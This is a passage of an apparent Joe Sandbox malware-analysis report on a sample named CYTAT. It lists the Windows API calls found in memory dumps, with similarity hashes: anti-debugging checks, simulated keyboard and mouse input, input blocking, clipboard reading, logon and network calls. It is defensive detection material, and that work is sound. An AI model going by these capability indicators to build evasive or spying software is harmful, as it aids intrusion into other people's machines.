                                                • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                • FindClose.KERNEL32(?), ref: 004525FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                • String ID: *.*$\VH
                                                • API String ID: 2786137511-2657498754
                                                • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                • String ID: pqI
                                                • API String ID: 2579439406-2459173057
                                                • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                APIs
                                                • __wcsicoll.LIBCMT ref: 00433349
                                                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                • __wcsicoll.LIBCMT ref: 00433375
                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsicollmouse_event
                                                • String ID: DOWN
                                                • API String ID: 1033544147-711622031
                                                • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: KeyboardMessagePostState$InputSend
                                                • String ID:
                                                • API String ID: 3031425849-0
                                                • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                APIs
                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorLastinet_addrsocket
                                                • String ID:
                                                • API String ID: 4170576061-0
                                                • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                APIs
                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                • IsWindowVisible.USER32 ref: 0047A368
                                                • IsWindowEnabled.USER32 ref: 0047A378
                                                • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                • IsIconic.USER32 ref: 0047A393
                                                • IsZoomed.USER32 ref: 0047A3A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                APIs
                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                • CoInitialize.OLE32(00000000), ref: 00478442
                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                • CoUninitialize.OLE32 ref: 0047863C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 886957087-24824748
                                                • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                APIs
                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                • CloseClipboard.USER32 ref: 0046DD41
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                • CloseClipboard.USER32 ref: 0046DD99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                • String ID:
                                                • API String ID: 15083398-0
                                                • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: U$\
                                                • API String ID: 4104443479-100911408
                                                • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Find$File$CloseFirstNext
                                                • String ID:
                                                • API String ID: 3541575487-0
                                                • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                • FindClose.KERNEL32(00000000), ref: 004339EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirst
                                                • String ID:
                                                • API String ID: 48322524-0
                                                • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                APIs
                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                • String ID:
                                                • API String ID: 901099227-0
                                                • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                APIs
                                                • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Proc
                                                • String ID:
                                                • API String ID: 2346855178-0
                                                • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                APIs
                                                • BlockInput.USER32(00000001), ref: 0045A38B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: BlockInput
                                                • String ID:
                                                • API String ID: 3456056419-0
                                                • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                APIs
                                                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: LogonUser
                                                • String ID:
                                                • API String ID: 1244722697-0
                                                • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
